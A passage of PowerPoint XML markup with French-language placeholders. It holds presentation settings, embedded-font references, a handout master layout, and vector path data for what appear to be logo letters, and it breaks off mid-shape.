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0"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId11"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="371" r:id="rId2"/>
    <p:sldId id="372" r:id="rId3"/>
    <p:sldId id="375" r:id="rId4"/>
    <p:sldId id="374" r:id="rId5"/>
    <p:sldId id="386" r:id="rId6"/>
    <p:sldId id="388" r:id="rId7"/>
    <p:sldId id="389" r:id="rId8"/>
    <p:sldId id="390" r:id="rId9"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="7099300" cy="10234613"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Gilroy" panose="00000500000000000000" pitchFamily="50" charset="0"/>
      <p:regular r:id="rId12"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Gilroy Bold" panose="020B0604020202020204" charset="0"/>
      <p:bold r:id="rId13"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Gilroy ExtraBold" panose="00000900000000000000" pitchFamily="50" charset="0"/>
      <p:bold r:id="rId14"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Gilroy Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId15"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="PT Sans" panose="020B0503020203020204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId16"/>
      <p:bold r:id="rId17"/>
      <p:italic r:id="rId18"/>
      <p:boldItalic r:id="rId19"/>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intemps [Template]" id="{F290821F-EA44-4B4D-AD6D-BCA4A3752AA5}">
          <p14:sldIdLst>
            <p14:sldId id="371"/>
            <p14:sldId id="372"/>
            <p14:sldId id="375"/>
            <p14:sldId id="374"/>
            <p14:sldId id="386"/>
            <p14:sldId id="388"/>
            <p14:sldId id="389"/>
            <p14:sldId id="390"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Toolbox" id="{382FC89F-9C0F-4375-ACC1-4B88B295D941}">
          <p14:sldIdLst/>
        </p14:section>
      </p14:sectionLst>
    </p:ext>
    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="2" pos="1935" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="79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F77"/>
    <a:srgbClr val="A1DDB8"/>
    <a:srgbClr val="00683C"/>
    <a:srgbClr val="CDE67E"/>
    <a:srgbClr val="9CD030"/>
    <a:srgbClr val="B4DCDE"/>
    <a:srgbClr val="B48932"/>
    <a:srgbClr val="C2A00E"/>
    <a:srgbClr val="B58A32"/>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704" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="112" d="100"/>
          <a:sy n="112" d="100"/>
        </p:scale>
        <p:origin x="42" y="-102"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide pos="1935"/>
        <p:guide orient="horz" pos="799"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-18691"/>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77" d="100"/>
          <a:sy n="77" d="100"/>
        </p:scale>
        <p:origin x="400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ED80324-2387-4ED5-B710-13FDE2CFF78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="3076363" cy="513508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="94622" tIns="47311" rIns="94622" bIns="47311"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D469CBC-D84A-427D-92BB-3EC2AA968A4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4021294" y="0"/>
            <a:ext cx="3076363" cy="513508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="94622" tIns="47311" rIns="94622" bIns="47311" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0B22F527-1F7E-419E-963F-77A869DDFCB8}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>23/04/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du pied de page 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83890C7F-89BF-4A87-AAEA-9F3694512B43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="9721108"/>
            <a:ext cx="3076363" cy="513507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="94622" tIns="47311" rIns="94622" bIns="47311"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1988DE0-9A50-4F60-8A63-05088567086D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4021294" y="9721108"/>
            <a:ext cx="3076363" cy="513507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="94622" tIns="47311" rIns="94622" bIns="47311" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E6D15DEA-005C-4B35-B898-428E2E567D6D}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Groupe 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA2C5163-E2FF-4A67-8604-264F515E063D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2687314" y="775211"/>
            <a:ext cx="1721014" cy="207278"/>
            <a:chOff x="1404936" y="4348162"/>
            <a:chExt cx="4044593" cy="450532"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Forme libre : forme 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E65935F-30FB-4E77-9154-2E534D1393D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404936" y="4356138"/>
              <a:ext cx="320053" cy="434554"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 276180 w 320053"/>
                <a:gd name="connsiteY0" fmla="*/ 38079 h 434554"/>
                <a:gd name="connsiteX1" fmla="*/ 226840 w 320053"/>
                <a:gd name="connsiteY1" fmla="*/ 9504 h 434554"/>
                <a:gd name="connsiteX2" fmla="*/ 163880 w 320053"/>
                <a:gd name="connsiteY2" fmla="*/ -21 h 434554"/>
                <a:gd name="connsiteX3" fmla="*/ -45 w 320053"/>
                <a:gd name="connsiteY3" fmla="*/ -21 h 434554"/>
                <a:gd name="connsiteX4" fmla="*/ -45 w 320053"/>
                <a:gd name="connsiteY4" fmla="*/ 434510 h 434554"/>
                <a:gd name="connsiteX5" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY5" fmla="*/ 434510 h 434554"/>
                <a:gd name="connsiteX6" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY6" fmla="*/ 281062 h 434554"/>
                <a:gd name="connsiteX7" fmla="*/ 163880 w 320053"/>
                <a:gd name="connsiteY7" fmla="*/ 281062 h 434554"/>
                <a:gd name="connsiteX8" fmla="*/ 226840 w 320053"/>
                <a:gd name="connsiteY8" fmla="*/ 270870 h 434554"/>
                <a:gd name="connsiteX9" fmla="*/ 276180 w 320053"/>
                <a:gd name="connsiteY9" fmla="*/ 242295 h 434554"/>
                <a:gd name="connsiteX10" fmla="*/ 308469 w 320053"/>
                <a:gd name="connsiteY10" fmla="*/ 197814 h 434554"/>
                <a:gd name="connsiteX11" fmla="*/ 319995 w 320053"/>
                <a:gd name="connsiteY11" fmla="*/ 140664 h 434554"/>
                <a:gd name="connsiteX12" fmla="*/ 308469 w 320053"/>
                <a:gd name="connsiteY12" fmla="*/ 83514 h 434554"/>
                <a:gd name="connsiteX13" fmla="*/ 276180 w 320053"/>
                <a:gd name="connsiteY13" fmla="*/ 38079 h 434554"/>
                <a:gd name="connsiteX14" fmla="*/ 211981 w 320053"/>
                <a:gd name="connsiteY14" fmla="*/ 185907 h 434554"/>
                <a:gd name="connsiteX15" fmla="*/ 163213 w 320053"/>
                <a:gd name="connsiteY15" fmla="*/ 203338 h 434554"/>
                <a:gd name="connsiteX16" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY16" fmla="*/ 203338 h 434554"/>
                <a:gd name="connsiteX17" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY17" fmla="*/ 78275 h 434554"/>
                <a:gd name="connsiteX18" fmla="*/ 163213 w 320053"/>
                <a:gd name="connsiteY18" fmla="*/ 78275 h 434554"/>
                <a:gd name="connsiteX19" fmla="*/ 211981 w 320053"/>
                <a:gd name="connsiteY19" fmla="*/ 95325 h 434554"/>
                <a:gd name="connsiteX20" fmla="*/ 229126 w 320053"/>
                <a:gd name="connsiteY20" fmla="*/ 140187 h 434554"/>
                <a:gd name="connsiteX21" fmla="*/ 211981 w 320053"/>
                <a:gd name="connsiteY21" fmla="*/ 185907 h 43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53" h="434554">
                  <a:moveTo>
                    <a:pt x="276180" y="38079"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="261777" y="25397"/>
                    <a:pt x="245009" y="15685"/>
                    <a:pt x="226840" y="9504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206527" y="2860"/>
                    <a:pt x="185249" y="-359"/>
                    <a:pt x="163880" y="-21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="-21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="-45" y="434510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="434510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="281062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163880" y="281062"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="185298" y="281328"/>
                    <a:pt x="206600" y="277880"/>
                    <a:pt x="226840" y="270870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245013" y="264698"/>
                    <a:pt x="261783" y="254986"/>
                    <a:pt x="276180" y="242295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289930" y="229884"/>
                    <a:pt x="300929" y="214732"/>
                    <a:pt x="308469" y="197814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316343" y="179804"/>
                    <a:pt x="320272" y="160317"/>
                    <a:pt x="319995" y="140664"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320208" y="121015"/>
                    <a:pt x="316281" y="101543"/>
                    <a:pt x="308469" y="83514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301147" y="66196"/>
                    <a:pt x="290126" y="50689"/>
                    <a:pt x="276180" y="38079"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="211981" y="185907"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="198826" y="198196"/>
                    <a:pt x="181177" y="204505"/>
                    <a:pt x="163213" y="203338"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="88823" y="203338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="78275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163213" y="78275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181114" y="77074"/>
                    <a:pt x="198728" y="83233"/>
                    <a:pt x="211981" y="95325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223624" y="107284"/>
                    <a:pt x="229825" y="123512"/>
                    <a:pt x="229126" y="140187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229861" y="157124"/>
                    <a:pt x="223670" y="173630"/>
                    <a:pt x="211981" y="185907"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Forme libre : forme 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C63F433-6FC3-4BBF-8821-793FF4C5C07A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1850230" y="4356616"/>
              <a:ext cx="365855" cy="434077"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 299611 w 365855"/>
                <a:gd name="connsiteY0" fmla="*/ 214386 h 434077"/>
                <a:gd name="connsiteX1" fmla="*/ 319995 w 365855"/>
                <a:gd name="connsiteY1" fmla="*/ 139710 h 434077"/>
                <a:gd name="connsiteX2" fmla="*/ 308469 w 365855"/>
                <a:gd name="connsiteY2" fmla="*/ 82560 h 434077"/>
                <a:gd name="connsiteX3" fmla="*/ 276180 w 365855"/>
                <a:gd name="connsiteY3" fmla="*/ 38078 h 434077"/>
                <a:gd name="connsiteX4" fmla="*/ 226840 w 365855"/>
                <a:gd name="connsiteY4" fmla="*/ 9503 h 434077"/>
                <a:gd name="connsiteX5" fmla="*/ 163975 w 365855"/>
                <a:gd name="connsiteY5" fmla="*/ -22 h 434077"/>
                <a:gd name="connsiteX6" fmla="*/ -45 w 365855"/>
                <a:gd name="connsiteY6" fmla="*/ -22 h 434077"/>
                <a:gd name="connsiteX7" fmla="*/ -45 w 365855"/>
                <a:gd name="connsiteY7" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX8" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY8" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX9" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY9" fmla="*/ 280585 h 434077"/>
                <a:gd name="connsiteX10" fmla="*/ 153402 w 365855"/>
                <a:gd name="connsiteY10" fmla="*/ 280585 h 434077"/>
                <a:gd name="connsiteX11" fmla="*/ 265702 w 365855"/>
                <a:gd name="connsiteY11" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX12" fmla="*/ 365810 w 365855"/>
                <a:gd name="connsiteY12" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX13" fmla="*/ 243318 w 365855"/>
                <a:gd name="connsiteY13" fmla="*/ 263535 h 434077"/>
                <a:gd name="connsiteX14" fmla="*/ 299611 w 365855"/>
                <a:gd name="connsiteY14" fmla="*/ 214386 h 434077"/>
                <a:gd name="connsiteX15" fmla="*/ 211981 w 365855"/>
                <a:gd name="connsiteY15" fmla="*/ 185144 h 434077"/>
                <a:gd name="connsiteX16" fmla="*/ 163308 w 365855"/>
                <a:gd name="connsiteY16" fmla="*/ 202194 h 434077"/>
                <a:gd name="connsiteX17" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY17" fmla="*/ 202194 h 434077"/>
                <a:gd name="connsiteX18" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY18" fmla="*/ 77798 h 434077"/>
                <a:gd name="connsiteX19" fmla="*/ 163308 w 365855"/>
                <a:gd name="connsiteY19" fmla="*/ 77798 h 434077"/>
                <a:gd name="connsiteX20" fmla="*/ 211981 w 365855"/>
                <a:gd name="connsiteY20" fmla="*/ 94847 h 434077"/>
                <a:gd name="connsiteX21" fmla="*/ 229126 w 365855"/>
                <a:gd name="connsiteY21" fmla="*/ 139710 h 434077"/>
                <a:gd name="connsiteX22" fmla="*/ 211981 w 365855"/>
                <a:gd name="connsiteY22" fmla="*/ 185144 h 43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5855" h="434077">
                  <a:moveTo>
                    <a:pt x="299611" y="214386"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="313527" y="192007"/>
                    <a:pt x="320614" y="166055"/>
                    <a:pt x="319995" y="139710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320204" y="120062"/>
                    <a:pt x="316280" y="100590"/>
                    <a:pt x="308469" y="82560"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301116" y="65533"/>
                    <a:pt x="290096" y="50343"/>
                    <a:pt x="276180" y="38078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261778" y="25396"/>
                    <a:pt x="245004" y="15684"/>
                    <a:pt x="226840" y="9503"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206561" y="2865"/>
                    <a:pt x="185311" y="-353"/>
                    <a:pt x="163975" y="-22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="-22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="-45" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="280585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153402" y="280585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265702" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365810" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243318" y="263535"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="266369" y="252830"/>
                    <a:pt x="285895" y="235782"/>
                    <a:pt x="299611" y="214386"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="211981" y="185144"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="198760" y="197222"/>
                    <a:pt x="181177" y="203380"/>
                    <a:pt x="163308" y="202194"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="88823" y="202194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="77798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163308" y="77798"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181168" y="76657"/>
                    <a:pt x="198732" y="82809"/>
                    <a:pt x="211981" y="94847"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223621" y="106807"/>
                    <a:pt x="229822" y="123035"/>
                    <a:pt x="229126" y="139710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229898" y="156567"/>
                    <a:pt x="223697" y="172997"/>
                    <a:pt x="211981" y="185144"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solid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48F92C93-38D9-4B2D-BED1-D6FFEDDB6188}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2353817" y="4356067"/>
              <a:ext cx="88868" cy="434721"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 88868"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX1" fmla="*/ 88868 w 88868"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX2" fmla="*/ 88868 w 88868"/>
                <a:gd name="connsiteY2" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 88868"/>
                <a:gd name="connsiteY3" fmla="*/ 434721 h 434721"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="88868" h="434721">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88868" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="434721"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solid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2786A941-B384-431D-A71C-7F753226C174}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2629947" y="4348162"/>
              <a:ext cx="370141" cy="450532"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 281178 w 370141"/>
                <a:gd name="connsiteY0" fmla="*/ 267367 h 450532"/>
                <a:gd name="connsiteX1" fmla="*/ 29623 w 370141"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 450532"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 370141"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 450532"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 370141"/>
                <a:gd name="connsiteY3" fmla="*/ 442627 h 450532"/>
                <a:gd name="connsiteX4" fmla="*/ 88868 w 370141"/>
                <a:gd name="connsiteY4" fmla="*/ 442627 h 450532"/>
                <a:gd name="connsiteX5" fmla="*/ 88868 w 370141"/>
                <a:gd name="connsiteY5" fmla="*/ 181832 h 450532"/>
                <a:gd name="connsiteX6" fmla="*/ 341185 w 370141"/>
                <a:gd name="connsiteY6" fmla="*/ 450533 h 450532"/>
                <a:gd name="connsiteX7" fmla="*/ 370142 w 370141"/>
                <a:gd name="connsiteY7" fmla="*/ 450533 h 450532"/>
                <a:gd name="connsiteX8" fmla="*/ 370142 w 370141"/>
                <a:gd name="connsiteY8" fmla="*/ 7906 h 450532"/>
                <a:gd name="connsiteX9" fmla="*/ 281178 w 370141"/>
                <a:gd name="connsiteY9" fmla="*/ 7906 h 450532"/>
                <a:gd name="connsiteX10" fmla="*/ 281178 w 370141"/>
                <a:gd name="connsiteY10" fmla="*/ 267367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1" h="450532">
                  <a:moveTo>
                    <a:pt x="281178" y="267367"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29623" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="181832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341185" y="450533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370142" y="450533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370142" y="7906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281178" y="7906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281178" y="267367"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solid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57C21A3-ACAD-4218-A77E-EA2D9A314561}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3145535" y="4356067"/>
              <a:ext cx="367474" cy="434721"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 367474"/>
                <a:gd name="connsiteY0" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX1" fmla="*/ 138970 w 367474"/>
                <a:gd name="connsiteY1" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX2" fmla="*/ 138970 w 367474"/>
                <a:gd name="connsiteY2" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX3" fmla="*/ 227838 w 367474"/>
                <a:gd name="connsiteY3" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX4" fmla="*/ 227838 w 367474"/>
                <a:gd name="connsiteY4" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX5" fmla="*/ 367475 w 367474"/>
                <a:gd name="connsiteY5" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX6" fmla="*/ 367475 w 367474"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 367474"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 367474"/>
                <a:gd name="connsiteY8" fmla="*/ 80391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74" h="434721">
                  <a:moveTo>
                    <a:pt x="0" y="80391"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138970" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138970" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227838" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227838" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367475" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367475" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="80391"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Forme libre : forme 13">
              <a:extLst>
